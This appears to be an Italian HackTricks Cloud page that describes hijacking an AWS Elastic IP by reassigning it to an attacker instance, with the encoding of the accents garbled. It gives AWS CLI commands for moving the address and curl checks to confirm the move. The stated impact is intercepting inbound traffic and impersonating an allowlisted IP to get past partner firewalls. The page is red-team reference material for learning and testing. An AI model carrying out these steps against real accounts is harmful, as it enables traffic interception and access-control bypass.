AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation
Tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al đŹ gruppo Discord o al gruppo telegram o seguici su Twitter đŚ @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.
Sommario
Abusa di ec2:AssociateAddress (e opzionalmente di ec2:DisassociateAddress) per riassegnare un Elastic IP (EIP) da unâistanza/ENI vittima a unâistanza/ENI dellâattaccante. Questo reindirizza il traffico in ingresso destinato allâEIP verso lâattaccante e permette anche allâattaccante di generare traffico in uscita con lâIP pubblico allowlisted per eludere i firewall dei partner esterni.
Prerequisiti
- ID di allocazione (allocation ID) dellâEIP target nello stesso account/VPC.
- Istanza/ENI dellâattaccante che controlli.
- Permessi:
ec2:DescribeAddressesec2:AssociateAddresssullâEIP allocation-id e sullâistanza/ENI dellâattaccanteec2:DisassociateAddress(opzionale). Nota:--allow-reassociationdissocia automaticamente dallâallegato precedente.
Attacco
Variabili
REGION=us-east-1
ATTACKER_INSTANCE=<i-attacker>
VICTIM_INSTANCE=<i-victim>
- Assegnare o identificare lâEIP della vittima (il lab ne assegna uno nuovo e lo associa alla vittima)
ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTANCE --region $REGION
EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query Addresses[0].PublicIp --output text)
- Verificare che lâEIP risolva attualmente al servizio della vittima (ad esempio controllando un banner)
curl -sS http://$EIP | grep -i victim
- Riassegnare lâEIP allâattaccante (si disassocia automaticamente dalla vittima)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION
- Verifica che lâEIP ora risolva verso lâattacker service
sleep 5; curl -sS http://$EIP | grep -i attacker
Evidenza (associazione spostata):
aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
--query Addresses[0].AssociationId --output text
Impatto
- Inbound impersonation: Tutto il traffico diretto allâhijacked EIP viene recapitato allâistanza/ENI dellâattacker.
- Outbound impersonation: Attacker può iniziare traffico che sembra provenire dallâallowlisted public IP (utile per bypassare i filtri IP di partner/sorgenti esterne).
Tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al đŹ gruppo Discord o al gruppo telegram o seguici su Twitter đŚ @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.
HackTricks Cloud

